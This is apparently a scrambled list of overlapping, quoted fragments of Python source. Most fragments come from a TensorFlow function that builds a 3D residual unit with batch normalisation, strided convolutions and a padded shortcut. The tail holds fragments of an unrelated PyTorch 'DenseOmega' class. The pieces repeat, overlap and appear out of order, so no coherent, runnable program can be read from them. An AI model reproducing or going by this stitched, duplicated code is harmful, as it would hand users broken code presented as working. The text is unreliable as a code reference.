vanilla_residual_unit_3d(inputs, out_filters, kernel_size=(3, 3, 3), strides=(1,", "1 with tf.variable_scope('sub_unit1'): x = tf.layers.batch_normalization( x, training=mode == tf.estimator.ModeKeys.TRAIN) x = activation(x)", "tf.estimator.ModeKeys.TRAIN) x = activation(x) x = tf.layers.conv3d( inputs=x, filters=out_filters, kernel_size=k, strides=strides, **conv_params) #", "optional): One of the tf.estimator.ModeKeys: TRAIN, EVAL or PREDICT activation (optional): A function", "3, 3), strides=(1, 1, 1), mode=tf.estimator.ModeKeys.EVAL, use_bias=False, activation=tf.nn.relu6, kernel_initializer=tf.initializers.variance_scaling(distribution='uniform'), bias_initializer=tf.zeros_initializer(), kernel_regularizer=None, bias_regularizer=None): \"\"\"Implementation", "# Adjust the strided conv kernel size to prevent losing information k =", "for a different input shape' x = inputs orig_x = x # Handle", "conv kernel size to prevent losing information k = [s * 2 if", "kernel_initializer=tf.initializers.variance_scaling(distribution='uniform'), bias_initializer=tf.zeros_initializer(), kernel_regularizer=None, bias_regularizer=None): \"\"\"Implementation of a 3D residual unit according to [1].", "[batch, x, y, z, channels]). out_filters (int): Number of convolutional filters used in", "numpy as np def vanilla_residual_unit_3d(inputs, out_filters, kernel_size=(3, 3, 3), strides=(1, 1, 1), mode=tf.estimator.ModeKeys.EVAL,", "= inputs.get_shape().as_list()[-1] assert in_filters == inputs.get_shape().as_list()[-1], \\ 'Module was initialised for a different", "optional): Convolution strides in (x,y,z) of sub unit 0. Allows downsampling of the", "x = activation(x) x = tf.layers.conv3d( inputs=x, filters=out_filters, kernel_size=k, strides=strides, **conv_params) # Sub", "TRAIN, EVAL or PREDICT activation (optional): A function to use as activation function.", "= activation(x) x = tf.layers.conv3d( inputs=x, filters=out_filters, kernel_size=kernel_size, strides=(1, 1, 1), **conv_params) #", "'use_bias': use_bias, 'kernel_initializer': kernel_initializer, 'bias_initializer': bias_initializer, 'kernel_regularizer': kernel_regularizer, 'bias_regularizer': bias_regularizer} in_filters = inputs.get_shape().as_list()[-1]", "__future__ import unicode_literals from __future__ import print_function from __future__ import division from __future__", "residual unit according to [1]. This implementation supports strided convolutions and automatically handles", "Size of the convoltional kernels used in the sub units strides (tuple, optional):", "was initialised for a different input shape' x = inputs orig_x = x", "k, s in zip(kernel_size, strides)] x = tf.layers.batch_normalization( x, training=mode == tf.estimator.ModeKeys.TRAIN) x", "inputs.get_shape().as_list()[-1], \\ 'Module was initialised for a different input shape' x = inputs", "to [1]. This implementation supports strided convolutions and automatically handles different input and", "sizes if in_filters < out_filters: orig_x = tf.pad( tensor=orig_x, paddings=[[0, 0]] * (len(x.get_shape().as_list())", "np.prod(strides) != 1: orig_x = pool_op(inputs=orig_x, pool_size=strides, strides=strides, padding='valid') # Sub unit 0", "elif in_filters > out_filters: orig_x = tf.layers.conv3d( inputs=orig_x, filters=out_filters, kernel_size=kernel_size, strides=(1, 1, 1),", "from __future__ import division from __future__ import absolute_import import tensorflow as tf import", "tf.layers.conv3d( inputs=x, filters=out_filters, kernel_size=kernel_size, strides=(1, 1, 1), **conv_params) # Add the residual with", "strides)] x = tf.layers.batch_normalization( x, training=mode == tf.estimator.ModeKeys.TRAIN) x = activation(x) x =", "> 1 else k for k, s in zip(kernel_size, strides)] x = tf.layers.batch_normalization(", "supports strided convolutions and automatically handles different input and output filters. [1] <NAME>", "- in_filters) / 2.)), int(np.ceil((out_filters - in_filters) / 2.))]]) elif in_filters > out_filters:", "strides=strides, **conv_params) # Sub unit 1 with tf.variable_scope('sub_unit1'): x = tf.layers.batch_normalization( x, training=mode", "3D residual unit according to [1]. This implementation supports strided convolutions and automatically", "to the residual unit. Is required to have a rank of 5 (i.e.", "[[ int(np.floor((out_filters - in_filters) / 2.)), int(np.ceil((out_filters - in_filters) / 2.))]]) elif in_filters", "in the sub units. kernel_size (tuple, optional): Size of the convoltional kernels used", "s in zip(kernel_size, strides)] x = tf.layers.batch_normalization( x, training=mode == tf.estimator.ModeKeys.TRAIN) x =", "bias_regularizer (None, optional): Additional regularisation op Returns: tf.Tensor: Output of the residual unit", "activation (optional): A function to use as activation function. use_bias (bool, optional): Train", "mode=tf.estimator.ModeKeys.EVAL, use_bias=False, activation=tf.nn.relu6, kernel_initializer=tf.initializers.variance_scaling(distribution='uniform'), bias_initializer=tf.zeros_initializer(), kernel_regularizer=None, bias_regularizer=None): \"\"\"Implementation of a 3D residual unit", "function to use as activation function. use_bias (bool, optional): Train a bias with", "rank of 5 (i.e. [batch, x, y, z, channels]). out_filters (int): Number of", "required to have a rank of 5 (i.e. [batch, x, y, z, channels]).", "convolutions and automatically handles different input and output filters. [1] <NAME> et al.", "filters used in the sub units. kernel_size (tuple, optional): Size of the convoltional", "< out_filters: orig_x = tf.pad( tensor=orig_x, paddings=[[0, 0]] * (len(x.get_shape().as_list()) - 1) +", "in_filters == inputs.get_shape().as_list()[-1], \\ 'Module was initialised for a different input shape' x", "op bias_regularizer (None, optional): Additional regularisation op Returns: tf.Tensor: Output of the residual", "kernel_size=k, strides=strides, **conv_params) # Sub unit 1 with tf.variable_scope('sub_unit1'): x = tf.layers.batch_normalization( x,", "x, training=mode == tf.estimator.ModeKeys.TRAIN) x = activation(x) x = tf.layers.conv3d( inputs=x, filters=out_filters, kernel_size=k,", "output filter sizes if in_filters < out_filters: orig_x = tf.pad( tensor=orig_x, paddings=[[0, 0]]", "the convoltional kernels used in the sub units strides (tuple, optional): Convolution strides", "tf.variable_scope('sub_unit1'): x = tf.layers.batch_normalization( x, training=mode == tf.estimator.ModeKeys.TRAIN) x = activation(x) x =", "filters=out_filters, kernel_size=k, strides=strides, **conv_params) # Sub unit 1 with tf.variable_scope('sub_unit1'): x = tf.layers.batch_normalization(", "= pool_op(inputs=orig_x, pool_size=strides, strides=strides, padding='valid') # Sub unit 0 with tf.variable_scope('sub_unit0'): # Adjust", "2 if s > 1 else k for k, s in zip(kernel_size, strides)]", "tensor via strides convolutions. mode (str, optional): One of the tf.estimator.ModeKeys: TRAIN, EVAL", "paddings=[[0, 0]] * (len(x.get_shape().as_list()) - 1) + [[ int(np.floor((out_filters - in_filters) / 2.)),", "function. use_bias (bool, optional): Train a bias with each convolution. kernel_initializer (TYPE, optional):", "the residual unit \"\"\" pool_op = tf.layers.max_pooling3d conv_params = {'padding': 'same', 'use_bias': use_bias,", "(TYPE, optional): Initialisation of convolution kernels bias_initializer (TYPE, optional): Initialisation of bias kernel_regularizer", "of the convoltional kernels used in the sub units strides (tuple, optional): Convolution", "bias kernel_regularizer (None, optional): Additional regularisation op bias_regularizer (None, optional): Additional regularisation op", "al. Identity Mappings in Deep Residual Networks. ECCV 2016. Args: inputs (tf.Tensor): Input", "= tf.layers.conv3d( inputs=orig_x, filters=out_filters, kernel_size=kernel_size, strides=(1, 1, 1), **conv_params) x += orig_x return", "(optional): A function to use as activation function. use_bias (bool, optional): Train a", "tf.layers.batch_normalization( x, training=mode == tf.estimator.ModeKeys.TRAIN) x = activation(x) x = tf.layers.conv3d( inputs=x, filters=out_filters,", "a rank of 5 (i.e. [batch, x, y, z, channels]). out_filters (int): Number", "x = inputs orig_x = x # Handle strided convolutions if np.prod(strides) !=", "input and output filters. [1] <NAME> et al. Identity Mappings in Deep Residual", "optional): Size of the convoltional kernels used in the sub units strides (tuple,", "tensor=orig_x, paddings=[[0, 0]] * (len(x.get_shape().as_list()) - 1) + [[ int(np.floor((out_filters - in_filters) /", "Identity Mappings in Deep Residual Networks. ECCV 2016. Args: inputs (tf.Tensor): Input tensor", "2.)), int(np.ceil((out_filters - in_filters) / 2.))]]) elif in_filters > out_filters: orig_x = tf.layers.conv3d(", "(int): Number of convolutional filters used in the sub units. kernel_size (tuple, optional):", "residual unit. Is required to have a rank of 5 (i.e. [batch, x,", "Sub unit 0 with tf.variable_scope('sub_unit0'): # Adjust the strided conv kernel size to", "losing information k = [s * 2 if s > 1 else k", "filters. [1] <NAME> et al. Identity Mappings in Deep Residual Networks. ECCV 2016.", "1, 1), mode=tf.estimator.ModeKeys.EVAL, use_bias=False, activation=tf.nn.relu6, kernel_initializer=tf.initializers.variance_scaling(distribution='uniform'), bias_initializer=tf.zeros_initializer(), kernel_regularizer=None, bias_regularizer=None): \"\"\"Implementation of a 3D", "kernel size to prevent losing information k = [s * 2 if s", "PREDICT activation (optional): A function to use as activation function. use_bias (bool, optional):", "kernel_regularizer=None, bias_regularizer=None): \"\"\"Implementation of a 3D residual unit according to [1]. This implementation", "import numpy as np def vanilla_residual_unit_3d(inputs, out_filters, kernel_size=(3, 3, 3), strides=(1, 1, 1),", "if s > 1 else k for k, s in zip(kernel_size, strides)] x", "int(np.floor((out_filters - in_filters) / 2.)), int(np.ceil((out_filters - in_filters) / 2.))]]) elif in_filters >", "tf.layers.conv3d( inputs=x, filters=out_filters, kernel_size=k, strides=strides, **conv_params) # Sub unit 1 with tf.variable_scope('sub_unit1'): x", "information k = [s * 2 if s > 1 else k for", "size to prevent losing information k = [s * 2 if s >", "Add the residual with tf.variable_scope('sub_unit_add'): # Handle differences in input and output filter", "3), strides=(1, 1, 1), mode=tf.estimator.ModeKeys.EVAL, use_bias=False, activation=tf.nn.relu6, kernel_initializer=tf.initializers.variance_scaling(distribution='uniform'), bias_initializer=tf.zeros_initializer(), kernel_regularizer=None, bias_regularizer=None): \"\"\"Implementation of", "* (len(x.get_shape().as_list()) - 1) + [[ int(np.floor((out_filters - in_filters) / 2.)), int(np.ceil((out_filters -", "np def vanilla_residual_unit_3d(inputs, out_filters, kernel_size=(3, 3, 3), strides=(1, 1, 1), mode=tf.estimator.ModeKeys.EVAL, use_bias=False, activation=tf.nn.relu6,", "orig_x = tf.layers.conv3d( inputs=orig_x, filters=out_filters, kernel_size=kernel_size, strides=(1, 1, 1), **conv_params) x += orig_x", "of sub unit 0. Allows downsampling of the input tensor via strides convolutions.", "x = tf.layers.conv3d( inputs=x, filters=out_filters, kernel_size=k, strides=strides, **conv_params) # Sub unit 1 with", "strides=(1, 1, 1), **conv_params) # Add the residual with tf.variable_scope('sub_unit_add'): # Handle differences", "training=mode == tf.estimator.ModeKeys.TRAIN) x = activation(x) x = tf.layers.conv3d( inputs=x, filters=out_filters, kernel_size=k, strides=strides,", "optional): Additional regularisation op bias_regularizer (None, optional): Additional regularisation op Returns: tf.Tensor: Output", "use_bias (bool, optional): Train a bias with each convolution. kernel_initializer (TYPE, optional): Initialisation", "input and output filter sizes if in_filters < out_filters: orig_x = tf.pad( tensor=orig_x,", "!= 1: orig_x = pool_op(inputs=orig_x, pool_size=strides, strides=strides, padding='valid') # Sub unit 0 with", "def vanilla_residual_unit_3d(inputs, out_filters, kernel_size=(3, 3, 3), strides=(1, 1, 1), mode=tf.estimator.ModeKeys.EVAL, use_bias=False, activation=tf.nn.relu6, kernel_initializer=tf.initializers.variance_scaling(distribution='uniform'),", "and automatically handles different input and output filters. [1] <NAME> et al. Identity", "kernel_regularizer, 'bias_regularizer': bias_regularizer} in_filters = inputs.get_shape().as_list()[-1] assert in_filters == inputs.get_shape().as_list()[-1], \\ 'Module was", "bias_initializer (TYPE, optional): Initialisation of bias kernel_regularizer (None, optional): Additional regularisation op bias_regularizer", "inputs orig_x = x # Handle strided convolutions if np.prod(strides) != 1: orig_x", "= tf.layers.batch_normalization( x, training=mode == tf.estimator.ModeKeys.TRAIN) x = activation(x) x = tf.layers.conv3d( inputs=x,", "1 else k for k, s in zip(kernel_size, strides)] x = tf.layers.batch_normalization( x,", "kernel_initializer (TYPE, optional): Initialisation of convolution kernels bias_initializer (TYPE, optional): Initialisation of bias", "training=mode == tf.estimator.ModeKeys.TRAIN) x = activation(x) x = tf.layers.conv3d( inputs=x, filters=out_filters, kernel_size=kernel_size, strides=(1,", "to have a rank of 5 (i.e. [batch, x, y, z, channels]). out_filters", "et al. Identity Mappings in Deep Residual Networks. ECCV 2016. Args: inputs (tf.Tensor):", "One of the tf.estimator.ModeKeys: TRAIN, EVAL or PREDICT activation (optional): A function to", "import absolute_import import tensorflow as tf import numpy as np def vanilla_residual_unit_3d(inputs, out_filters,", "in (x,y,z) of sub unit 0. Allows downsampling of the input tensor via", "in_filters) / 2.))]]) elif in_filters > out_filters: orig_x = tf.layers.conv3d( inputs=orig_x, filters=out_filters, kernel_size=kernel_size,", "Number of convolutional filters used in the sub units. kernel_size (tuple, optional): Size", "inputs=x, filters=out_filters, kernel_size=k, strides=strides, **conv_params) # Sub unit 1 with tf.variable_scope('sub_unit1'): x =", "kernel_size=kernel_size, strides=(1, 1, 1), **conv_params) # Add the residual with tf.variable_scope('sub_unit_add'): # Handle", "import tensorflow as tf import numpy as np def vanilla_residual_unit_3d(inputs, out_filters, kernel_size=(3, 3,", "bias_regularizer=None): \"\"\"Implementation of a 3D residual unit according to [1]. This implementation supports", "used in the sub units. kernel_size (tuple, optional): Size of the convoltional kernels", "optional): Train a bias with each convolution. kernel_initializer (TYPE, optional): Initialisation of convolution", "strided conv kernel size to prevent losing information k = [s * 2", "regularisation op Returns: tf.Tensor: Output of the residual unit \"\"\" pool_op = tf.layers.max_pooling3d", "convolution kernels bias_initializer (TYPE, optional): Initialisation of bias kernel_regularizer (None, optional): Additional regularisation", "* 2 if s > 1 else k for k, s in zip(kernel_size,", "[1]. This implementation supports strided convolutions and automatically handles different input and output", "Is required to have a rank of 5 (i.e. [batch, x, y, z,", "= {'padding': 'same', 'use_bias': use_bias, 'kernel_initializer': kernel_initializer, 'bias_initializer': bias_initializer, 'kernel_regularizer': kernel_regularizer, 'bias_regularizer': bias_regularizer}", "(len(x.get_shape().as_list()) - 1) + [[ int(np.floor((out_filters - in_filters) / 2.)), int(np.ceil((out_filters - in_filters)", "convolutional filters used in the sub units. kernel_size (tuple, optional): Size of the", "of the residual unit \"\"\" pool_op = tf.layers.max_pooling3d conv_params = {'padding': 'same', 'use_bias':", "tf import numpy as np def vanilla_residual_unit_3d(inputs, out_filters, kernel_size=(3, 3, 3), strides=(1, 1,", "regularisation op bias_regularizer (None, optional): Additional regularisation op Returns: tf.Tensor: Output of the", "= tf.layers.max_pooling3d conv_params = {'padding': 'same', 'use_bias': use_bias, 'kernel_initializer': kernel_initializer, 'bias_initializer': bias_initializer, 'kernel_regularizer':", "a bias with each convolution. kernel_initializer (TYPE, optional): Initialisation of convolution kernels bias_initializer", "Additional regularisation op bias_regularizer (None, optional): Additional regularisation op Returns: tf.Tensor: Output of", "Input tensor to the residual unit. Is required to have a rank of", "/ 2.)), int(np.ceil((out_filters - in_filters) / 2.))]]) elif in_filters > out_filters: orig_x =", "tf.estimator.ModeKeys.TRAIN) x = activation(x) x = tf.layers.conv3d( inputs=x, filters=out_filters, kernel_size=kernel_size, strides=(1, 1, 1),", "(bool, optional): Train a bias with each convolution. kernel_initializer (TYPE, optional): Initialisation of", "= inputs orig_x = x # Handle strided convolutions if np.prod(strides) != 1:", "sub units. kernel_size (tuple, optional): Size of the convoltional kernels used in the", "orig_x = x # Handle strided convolutions if np.prod(strides) != 1: orig_x =", "the residual with tf.variable_scope('sub_unit_add'): # Handle differences in input and output filter sizes", "x, y, z, channels]). out_filters (int): Number of convolutional filters used in the", "'kernel_initializer': kernel_initializer, 'bias_initializer': bias_initializer, 'kernel_regularizer': kernel_regularizer, 'bias_regularizer': bias_regularizer} in_filters = inputs.get_shape().as_list()[-1] assert in_filters", "(tuple, optional): Convolution strides in (x,y,z) of sub unit 0. Allows downsampling of", "**conv_params) # Add the residual with tf.variable_scope('sub_unit_add'): # Handle differences in input and", "\"\"\" pool_op = tf.layers.max_pooling3d conv_params = {'padding': 'same', 'use_bias': use_bias, 'kernel_initializer': kernel_initializer, 'bias_initializer':", "Residual Networks. ECCV 2016. Args: inputs (tf.Tensor): Input tensor to the residual unit.", "'Module was initialised for a different input shape' x = inputs orig_x =", "bias_initializer, 'kernel_regularizer': kernel_regularizer, 'bias_regularizer': bias_regularizer} in_filters = inputs.get_shape().as_list()[-1] assert in_filters == inputs.get_shape().as_list()[-1], \\", "- 1) + [[ int(np.floor((out_filters - in_filters) / 2.)), int(np.ceil((out_filters - in_filters) /", "import division from __future__ import absolute_import import tensorflow as tf import numpy as", "use_bias, 'kernel_initializer': kernel_initializer, 'bias_initializer': bias_initializer, 'kernel_regularizer': kernel_regularizer, 'bias_regularizer': bias_regularizer} in_filters = inputs.get_shape().as_list()[-1] assert", "# Sub unit 0 with tf.variable_scope('sub_unit0'): # Adjust the strided conv kernel size", "the tf.estimator.ModeKeys: TRAIN, EVAL or PREDICT activation (optional): A function to use as", "inputs (tf.Tensor): Input tensor to the residual unit. Is required to have a", "inputs.get_shape().as_list()[-1] assert in_filters == inputs.get_shape().as_list()[-1], \\ 'Module was initialised for a different input", "unit 0. Allows downsampling of the input tensor via strides convolutions. mode (str,", "kernel_size=(3, 3, 3), strides=(1, 1, 1), mode=tf.estimator.ModeKeys.EVAL, use_bias=False, activation=tf.nn.relu6, kernel_initializer=tf.initializers.variance_scaling(distribution='uniform'), bias_initializer=tf.zeros_initializer(), kernel_regularizer=None, bias_regularizer=None):", "# Add the residual with tf.variable_scope('sub_unit_add'): # Handle differences in input and output", "downsampling of the input tensor via strides convolutions. mode (str, optional): One of", "with tf.variable_scope('sub_unit1'): x = tf.layers.batch_normalization( x, training=mode == tf.estimator.ModeKeys.TRAIN) x = activation(x) x", "0]] * (len(x.get_shape().as_list()) - 1) + [[ int(np.floor((out_filters - in_filters) / 2.)), int(np.ceil((out_filters", "== tf.estimator.ModeKeys.TRAIN) x = activation(x) x = tf.layers.conv3d( inputs=x, filters=out_filters, kernel_size=kernel_size, strides=(1, 1,", "int(np.ceil((out_filters - in_filters) / 2.))]]) elif in_filters > out_filters: orig_x = tf.layers.conv3d( inputs=orig_x,", "= [s * 2 if s > 1 else k for k, s", "activation(x) x = tf.layers.conv3d( inputs=x, filters=out_filters, kernel_size=kernel_size, strides=(1, 1, 1), **conv_params) # Add", "This implementation supports strided convolutions and automatically handles different input and output filters.", "bias_regularizer} in_filters = inputs.get_shape().as_list()[-1] assert in_filters == inputs.get_shape().as_list()[-1], \\ 'Module was initialised for", "in_filters = inputs.get_shape().as_list()[-1] assert in_filters == inputs.get_shape().as_list()[-1], \\ 'Module was initialised for a", "2.))]]) elif in_filters > out_filters: orig_x = tf.layers.conv3d( inputs=orig_x, filters=out_filters, kernel_size=kernel_size, strides=(1, 1,", "import print_function from __future__ import division from __future__ import absolute_import import tensorflow as", "unit 1 with tf.variable_scope('sub_unit1'): x = tf.layers.batch_normalization( x, training=mode == tf.estimator.ModeKeys.TRAIN) x =", "\"\"\"Implementation of a 3D residual unit according to [1]. This implementation supports strided", "different input shape' x = inputs orig_x = x # Handle strided convolutions", "as activation function. use_bias (bool, optional): Train a bias with each convolution. kernel_initializer", "optional): Initialisation of bias kernel_regularizer (None, optional): Additional regularisation op bias_regularizer (None, optional):", "k for k, s in zip(kernel_size, strides)] x = tf.layers.batch_normalization( x, training=mode ==", "[s * 2 if s > 1 else k for k, s in", "x = tf.layers.batch_normalization( x, training=mode == tf.estimator.ModeKeys.TRAIN) x = activation(x) x = tf.layers.conv3d(", "{'padding': 'same', 'use_bias': use_bias, 'kernel_initializer': kernel_initializer, 'bias_initializer': bias_initializer, 'kernel_regularizer': kernel_regularizer, 'bias_regularizer': bias_regularizer} in_filters", "division from __future__ import absolute_import import tensorflow as tf import numpy as np", "Returns: tf.Tensor: Output of the residual unit \"\"\" pool_op = tf.layers.max_pooling3d conv_params =", "inputs=x, filters=out_filters, kernel_size=kernel_size, strides=(1, 1, 1), **conv_params) # Add the residual with tf.variable_scope('sub_unit_add'):", "'bias_regularizer': bias_regularizer} in_filters = inputs.get_shape().as_list()[-1] assert in_filters == inputs.get_shape().as_list()[-1], \\ 'Module was initialised", "tf.estimator.ModeKeys: TRAIN, EVAL or PREDICT activation (optional): A function to use as activation", "of convolution kernels bias_initializer (TYPE, optional): Initialisation of bias kernel_regularizer (None, optional): Additional", "units strides (tuple, optional): Convolution strides in (x,y,z) of sub unit 0. Allows", "from __future__ import unicode_literals from __future__ import print_function from __future__ import division from", "kernels used in the sub units strides (tuple, optional): Convolution strides in (x,y,z)", "= activation(x) x = tf.layers.conv3d( inputs=x, filters=out_filters, kernel_size=k, strides=strides, **conv_params) # Sub unit", "pool_op = tf.layers.max_pooling3d conv_params = {'padding': 'same', 'use_bias': use_bias, 'kernel_initializer': kernel_initializer, 'bias_initializer': bias_initializer,", "optional): Initialisation of convolution kernels bias_initializer (TYPE, optional): Initialisation of bias kernel_regularizer (None,", "0. Allows downsampling of the input tensor via strides convolutions. mode (str, optional):", "z, channels]). out_filters (int): Number of convolutional filters used in the sub units.", "conv_params = {'padding': 'same', 'use_bias': use_bias, 'kernel_initializer': kernel_initializer, 'bias_initializer': bias_initializer, 'kernel_regularizer': kernel_regularizer, 'bias_regularizer':", "unit. Is required to have a rank of 5 (i.e. [batch, x, y,", "initialised for a different input shape' x = inputs orig_x = x #", "in_filters > out_filters: orig_x = tf.layers.conv3d( inputs=orig_x, filters=out_filters, kernel_size=kernel_size, strides=(1, 1, 1), **conv_params)", "k = [s * 2 if s > 1 else k for k,", "= tf.layers.conv3d( inputs=x, filters=out_filters, kernel_size=k, strides=strides, **conv_params) # Sub unit 1 with tf.variable_scope('sub_unit1'):", "mode (str, optional): One of the tf.estimator.ModeKeys: TRAIN, EVAL or PREDICT activation (optional):", "convoltional kernels used in the sub units strides (tuple, optional): Convolution strides in", "1: orig_x = pool_op(inputs=orig_x, pool_size=strides, strides=strides, padding='valid') # Sub unit 0 with tf.variable_scope('sub_unit0'):", "Sub unit 1 with tf.variable_scope('sub_unit1'): x = tf.layers.batch_normalization( x, training=mode == tf.estimator.ModeKeys.TRAIN) x", "strides (tuple, optional): Convolution strides in (x,y,z) of sub unit 0. Allows downsampling", "- in_filters) / 2.))]]) elif in_filters > out_filters: orig_x = tf.layers.conv3d( inputs=orig_x, filters=out_filters,", "tensor to the residual unit. Is required to have a rank of 5", "(None, optional): Additional regularisation op Returns: tf.Tensor: Output of the residual unit \"\"\"", "the sub units strides (tuple, optional): Convolution strides in (x,y,z) of sub unit", "**conv_params) # Sub unit 1 with tf.variable_scope('sub_unit1'): x = tf.layers.batch_normalization( x, training=mode ==", "(tf.Tensor): Input tensor to the residual unit. Is required to have a rank", "the input tensor via strides convolutions. mode (str, optional): One of the tf.estimator.ModeKeys:", "input tensor via strides convolutions. mode (str, optional): One of the tf.estimator.ModeKeys: TRAIN,", "Mappings in Deep Residual Networks. ECCV 2016. Args: inputs (tf.Tensor): Input tensor to", "each convolution. kernel_initializer (TYPE, optional): Initialisation of convolution kernels bias_initializer (TYPE, optional): Initialisation", "tf.variable_scope('sub_unit_add'): # Handle differences in input and output filter sizes if in_filters <", "1, 1), **conv_params) # Add the residual with tf.variable_scope('sub_unit_add'): # Handle differences in", "'bias_initializer': bias_initializer, 'kernel_regularizer': kernel_regularizer, 'bias_regularizer': bias_regularizer} in_filters = inputs.get_shape().as_list()[-1] assert in_filters == inputs.get_shape().as_list()[-1],", "A function to use as activation function. use_bias (bool, optional): Train a bias", "Additional regularisation op Returns: tf.Tensor: Output of the residual unit \"\"\" pool_op =", "1), mode=tf.estimator.ModeKeys.EVAL, use_bias=False, activation=tf.nn.relu6, kernel_initializer=tf.initializers.variance_scaling(distribution='uniform'), bias_initializer=tf.zeros_initializer(), kernel_regularizer=None, bias_regularizer=None): \"\"\"Implementation of a 3D residual", "x = tf.layers.conv3d( inputs=x, filters=out_filters, kernel_size=kernel_size, strides=(1, 1, 1), **conv_params) # Add the", "of convolutional filters used in the sub units. kernel_size (tuple, optional): Size of", "of bias kernel_regularizer (None, optional): Additional regularisation op bias_regularizer (None, optional): Additional regularisation", "Initialisation of bias kernel_regularizer (None, optional): Additional regularisation op bias_regularizer (None, optional): Additional", "s > 1 else k for k, s in zip(kernel_size, strides)] x =", "(TYPE, optional): Initialisation of bias kernel_regularizer (None, optional): Additional regularisation op bias_regularizer (None,", "automatically handles different input and output filters. [1] <NAME> et al. Identity Mappings", "x # Handle strided convolutions if np.prod(strides) != 1: orig_x = pool_op(inputs=orig_x, pool_size=strides,", "= tf.pad( tensor=orig_x, paddings=[[0, 0]] * (len(x.get_shape().as_list()) - 1) + [[ int(np.floor((out_filters -", "Handle differences in input and output filter sizes if in_filters < out_filters: orig_x", "tensorflow as tf import numpy as np def vanilla_residual_unit_3d(inputs, out_filters, kernel_size=(3, 3, 3),", "convolutions. mode (str, optional): One of the tf.estimator.ModeKeys: TRAIN, EVAL or PREDICT activation", "(str, optional): One of the tf.estimator.ModeKeys: TRAIN, EVAL or PREDICT activation (optional): A", "from __future__ import absolute_import import tensorflow as tf import numpy as np def", "unicode_literals from __future__ import print_function from __future__ import division from __future__ import absolute_import", "x = activation(x) x = tf.layers.conv3d( inputs=x, filters=out_filters, kernel_size=kernel_size, strides=(1, 1, 1), **conv_params)", "or PREDICT activation (optional): A function to use as activation function. use_bias (bool,", "strides=(1, 1, 1), mode=tf.estimator.ModeKeys.EVAL, use_bias=False, activation=tf.nn.relu6, kernel_initializer=tf.initializers.variance_scaling(distribution='uniform'), bias_initializer=tf.zeros_initializer(), kernel_regularizer=None, bias_regularizer=None): \"\"\"Implementation of a", "print_function from __future__ import division from __future__ import absolute_import import tensorflow as tf", "for k, s in zip(kernel_size, strides)] x = tf.layers.batch_normalization( x, training=mode == tf.estimator.ModeKeys.TRAIN)", "op Returns: tf.Tensor: Output of the residual unit \"\"\" pool_op = tf.layers.max_pooling3d conv_params", "residual unit \"\"\" pool_op = tf.layers.max_pooling3d conv_params = {'padding': 'same', 'use_bias': use_bias, 'kernel_initializer':", "/ 2.))]]) elif in_filters > out_filters: orig_x = tf.layers.conv3d( inputs=orig_x, filters=out_filters, kernel_size=kernel_size, strides=(1,", "prevent losing information k = [s * 2 if s > 1 else", "filters=out_filters, kernel_size=kernel_size, strides=(1, 1, 1), **conv_params) # Add the residual with tf.variable_scope('sub_unit_add'): #", "strided convolutions if np.prod(strides) != 1: orig_x = pool_op(inputs=orig_x, pool_size=strides, strides=strides, padding='valid') #", "[1] <NAME> et al. Identity Mappings in Deep Residual Networks. ECCV 2016. Args:", "residual with tf.variable_scope('sub_unit_add'): # Handle differences in input and output filter sizes if", "differences in input and output filter sizes if in_filters < out_filters: orig_x =", "strided convolutions and automatically handles different input and output filters. [1] <NAME> et", "pool_size=strides, strides=strides, padding='valid') # Sub unit 0 with tf.variable_scope('sub_unit0'): # Adjust the strided", "use as activation function. use_bias (bool, optional): Train a bias with each convolution.", "convolutions if np.prod(strides) != 1: orig_x = pool_op(inputs=orig_x, pool_size=strides, strides=strides, padding='valid') # Sub", "with tf.variable_scope('sub_unit_add'): # Handle differences in input and output filter sizes if in_filters", "pool_op(inputs=orig_x, pool_size=strides, strides=strides, padding='valid') # Sub unit 0 with tf.variable_scope('sub_unit0'): # Adjust the", "to prevent losing information k = [s * 2 if s > 1", "in Deep Residual Networks. ECCV 2016. Args: inputs (tf.Tensor): Input tensor to the", "convolution. kernel_initializer (TYPE, optional): Initialisation of convolution kernels bias_initializer (TYPE, optional): Initialisation of", "kernels bias_initializer (TYPE, optional): Initialisation of bias kernel_regularizer (None, optional): Additional regularisation op" ]
[ "should have bias=False # but this does not have an effect due to", "c): super(DenseOmega, self).__init__() self.n = n self.c = c # self.fc should have", "an effect due to the custom forward pass below # the bug was", "custom forward pass below # the bug was not fixed to maintain compatibility", "# self.fc should have bias=False # but this does not have an effect", "not fixed to maintain compatibility with older model checkpoints self.fc = nn.Linear(n*c, n*c)", "= v.reshape((batch, self.c*self.n, 1)) y1 = torch.matmul(self.fc.weight, x) y2 = torch.matmul(self.fc.weight.t(), x) return", "but this does not have an effect due to the custom forward pass", "model checkpoints self.fc = nn.Linear(n*c, n*c) def forward(self, v): batch = v.shape[0] x", "1). \"\"\" def __init__(self, n, c): super(DenseOmega, self).__init__() self.n = n self.c =", "shape (batch, c, n, 1). \"\"\" def __init__(self, n, c): super(DenseOmega, self).__init__() self.n", "forward(self, v): batch = v.shape[0] x = v.reshape((batch, self.c*self.n, 1)) y1 = torch.matmul(self.fc.weight,", "due to the custom forward pass below # the bug was not fixed", "the bug was not fixed to maintain compatibility with older model checkpoints self.fc", "torch import torch.nn as nn class DenseOmega(nn.Module): \"\"\" Dense (+symmetric) Omega matrix which", "= v.shape[0] x = v.reshape((batch, self.c*self.n, 1)) y1 = torch.matmul(self.fc.weight, x) y2 =", "__init__(self, n, c): super(DenseOmega, self).__init__() self.n = n self.c = c # self.fc", "have an effect due to the custom forward pass below # the bug", "x) y2 = torch.matmul(self.fc.weight.t(), x) return 0.5*(y1+y2).reshape((batch, self.c, self.n, 1)) def dense_matrix(self): return", "older model checkpoints self.fc = nn.Linear(n*c, n*c) def forward(self, v): batch = v.shape[0]", "self.fc should have bias=False # but this does not have an effect due", "DenseOmega(nn.Module): \"\"\" Dense (+symmetric) Omega matrix which applies to vectorized state with shape", "batch = v.shape[0] x = v.reshape((batch, self.c*self.n, 1)) y1 = torch.matmul(self.fc.weight, x) y2", "with shape (batch, c, n, 1). \"\"\" def __init__(self, n, c): super(DenseOmega, self).__init__()", "effect due to the custom forward pass below # the bug was not", "the custom forward pass below # the bug was not fixed to maintain", "import torch.nn as nn class DenseOmega(nn.Module): \"\"\" Dense (+symmetric) Omega matrix which applies", "v.reshape((batch, self.c*self.n, 1)) y1 = torch.matmul(self.fc.weight, x) y2 = torch.matmul(self.fc.weight.t(), x) return 0.5*(y1+y2).reshape((batch,", "self.n = n self.c = c # self.fc should have bias=False # but", "bias=False # but this does not have an effect due to the custom", "# but this does not have an effect due to the custom forward", "(+symmetric) Omega matrix which applies to vectorized state with shape (batch, c, n,", "torch.nn as nn class 